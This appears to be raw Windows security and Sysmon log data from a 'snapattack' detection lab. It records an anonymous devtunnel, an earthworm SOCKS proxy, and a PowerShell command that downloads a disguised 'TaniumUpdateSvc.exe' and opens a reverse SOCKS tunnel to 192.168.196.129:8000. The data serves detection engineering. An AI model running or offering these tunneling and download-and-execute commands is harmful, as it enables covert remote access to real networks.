4688 2 0 13312 0 0x8020000000000000 971342 Security WIN10-21H1.snapattack.labs S-1-5-21-1538153195-943065003-848949206-1000 localuser WIN10-21H1 0x90441 0xbb8 C:\Users\localuser\AppData\Local\Microsoft\WinGet\Packages\Microsoft.devtunnel_Microsoft.Winget.Source_8wekyb3d8bbwe\devtunnel.exe %%1936 0x108c "C:\Users\localuser\AppData\Local\Microsoft\WinGet\Links\devtunnel.exe" create --allow-anonymous S-1-0-0 - - 0x0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe S-1-16-12288 4688 2 0 13312 0 0x8020000000000000 971342 Security WIN10-21H1.snapattack.labs S-1-5-21-1538153195-943065003-848949206-1000 localuser WIN10-21H1 0x90441 0xbb8 C:\Users\localuser\AppData\Local\Microsoft\WinGet\Packages\Microsoft.devtunnel_Microsoft.Winget.Source_8wekyb3d8bbwe\devtunnel.exe %%1936 0x108c "C:\Users\localuser\AppData\Local\Microsoft\WinGet\Links\devtunnel.exe" create --allow-anonymous S-1-0-0 - - 0x0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe S-1-16-12288 7 3 4 7 0 0x8000000000000000 1593888 Microsoft-Windows-Sysmon/Operational WIN10-21H1.snapattack.labs - 2024-08-22 17:38:06.457 F51F9151-777E-66C7-DD0A-000000001000 7416 C:\Users\localuser\AppData\Local\Microsoft\WinGet\Packages\Microsoft.devtunnel_Microsoft.Winget.Source_8wekyb3d8bbwe\devtunnel.exe C:\Users\LOCALU~1\AppData\Local\Temp\.net\devtunnel\8ZUAWkQdgHLcrdOM4WIbDDZvRGKRiWM=\devtunnel.dll 1.0.1338.8851 devtunnel Microsoft Visual Studio SaaS Microsoft devtunnel.dll MD5=4FD6E35DFDD1B993CE03BDB0AC47FD33,SHA256=C0513783D569051BDC230587729B1DA881F7032C2AD6E8FEDBBDCC61D813DA25,IMPHASH=00000000000000000000000000000000 false - Unavailable WIN10-21H1\localuser 4688 2 0 13312 0 0x8020000000000000 4427578 Security quadra.snapattack.labs S-1-5-21-421648065-3458498710-3574272164-1103 snapattack SNAPATTACK 0x23483 0x1cb4 C:\Users\patreides\Desktop\earthworm\earthworm.exe %%1937 0x17d4 "C:\users\patreides\Desktop\earthworm\earthworm.exe" -s ssocksd -l 1080 S-1-0-0 - - 0x0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe S-1-16-12288 4688 2 0 13312 0 0x8020000000000000 748196 Security MSEDGEWIN10.snapattack.labs S-1-5-18 MSEDGEWIN10$ SNAPATTACK 0x3e7 0x177c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe %%1936 0x276c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . "powershell.exe mkdir C:\TEMP1; wget http://192.168.196.129/TaniumUpdateSvc.exe -O C:\TEMP1\TaniumUpdateSvc.exe; C:\TEMP1\TaniumUpdateSvc.exe client 192.168.196.129:8000 R:socks" S-1-0-0 - - 0x0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe S-1-16-16384 7 3 4 7 0 0x8000000000000000 1593888 Microsoft-Windows-Sysmon/Operational WIN10-21H1.snapattack.labs - 2024-08-22 17:38:06.457 F51F9151-777E-66C7-DD0A-000000001000 7416 C:\Users\localuser\AppData\Local\Microsoft\WinGet\Packages\Microsoft.devtunnel_Microsoft.Winget.Source_8wekyb3d8bbwe\devtunnel.exe C:\Users\LOCALU~1\AppData\Local\Temp\.net\devtunnel\8ZUAWkQdgHLcrdOM4WIbDDZvRGKRiWM=\devtunnel.dll 1.0.1338.8851 devtunnel Microsoft Visual Studio SaaS Microsoft devtunnel.dll MD5=4FD6E35DFDD1B993CE03BDB0AC47FD33,SHA256=C0513783D569051BDC230587729B1DA881F7032C2AD6E8FEDBBDCC61D813DA25,IMPHASH=00000000000000000000000000000000 false - Unavailable WIN10-21H1\localuser